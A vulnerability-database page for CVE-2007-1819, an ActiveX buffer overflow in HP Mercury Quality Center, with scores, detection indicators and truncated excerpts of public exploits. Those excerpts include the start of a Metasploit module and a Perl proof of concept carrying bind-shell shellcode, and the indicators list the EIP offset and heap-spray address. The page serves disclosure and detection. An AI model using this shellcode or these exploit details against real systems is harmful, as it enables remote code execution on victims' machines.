CVE-2007-1819
published 2007-04-02CVE-2007-1819: Stack-based buffer overflow in the SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 in TestDirector (TD) for Mercury Quality Center 9.0 before Patch…
PriorityP258critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
39.73%
98.4th percentile
Stack-based buffer overflow in the SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 in TestDirector (TD) for Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32, allows remote attackers to execute arbitrary code via a long ProgColor property.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | mercury_quality_center | — | — |
| hp | mercury_quality_center | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45
- →Detect instantiation of the vulnerable SPIDERLib.Loader ActiveX control (CLSID associated with Spider90.ocx) in browser content, particularly when the ProgColor property is set to an abnormally long string. ↗
- →Look for heap spray patterns using the 0x0C0C0C0C address in JavaScript (repeated %u0C0C%u0C0C unescape sequences) delivered alongside ActiveX object instantiation. ↗
- →Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash; shellcode delivered via unescape() will avoid these bytes. ↗
- →The exploit buffer offset to EIP is 64 bytes; a stack-based overflow with exactly 64 bytes of padding before the return address is a strong indicator of this specific exploit. ↗
- ·The Metasploit module targets Windows XP SP0-SP3 and Windows Vista SP0-SP1 with IE 6.0 SP0-2 and IE 7.0 only; the heap spray and return address (0x0C0C0C0C) are specific to these platform/browser combinations. ↗
- ·The StackAdjustment of -3500 is used by the Metasploit payload to avoid clobbering itself on the stack; this is exploit-framework-specific and may differ in custom exploit variants. ↗
- ·The POC shellcode (EDB-3661) opens a bind shell on port 5555; real-world attackers will substitute different payloads, so port 5555 alone is not a reliable indicator. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-1819 HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)
HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)
---
##
# $Id: hpmqc_progcolor.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in SPIDERLib.Loader
ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)
for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and
8.2 SP1 before Patch 32.
By setting an over
Exploit-DB
HP Mercury Quality Center - Spider90.ocx ProgColor Overflow
exploitdb·2007-04-04
CVE-2007-1819 HP Mercury Quality Center - Spider90.ocx ProgColor Overflow
HP Mercury Quality Center - Spider90.ocx ProgColor Overflow
---
#!/usr/bin/perl
# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit
# Vulnerability found by Titon and Ri0t of Bastardlabs
use strict;
# win32_bind LPORT = 5555 - Metasploit
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\
Metasploit
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
metasploit
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00901872http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497http://secunia.com/advisories/24692http://securitytracker.com/id?1017835http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7a0f7f0efc7905fdc225729f004cf387?OpenDocumenthttp://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/cf109e434c7765eac22572a4006c6e94?OpenDocumenthttp://www.kb.cert.org/vuls/id/589097http://www.securityfocus.com/bid/23239http://www.vupen.com/english/advisories/2007/1185https://exchange.xforce.ibmcloud.com/vulnerabilities/33353http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00901872http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497http://secunia.com/advisories/24692http://securitytracker.com/id?1017835http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7a0f7f0efc7905fdc225729f004cf387?OpenDocumenthttp://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/cf109e434c7765eac22572a4006c6e94?OpenDocumenthttp://www.kb.cert.org/vuls/id/589097http://www.securityfocus.com/bid/23239http://www.vupen.com/english/advisories/2007/1185https://exchange.xforce.ibmcloud.com/vulnerabilities/33353
2007-04-02
Published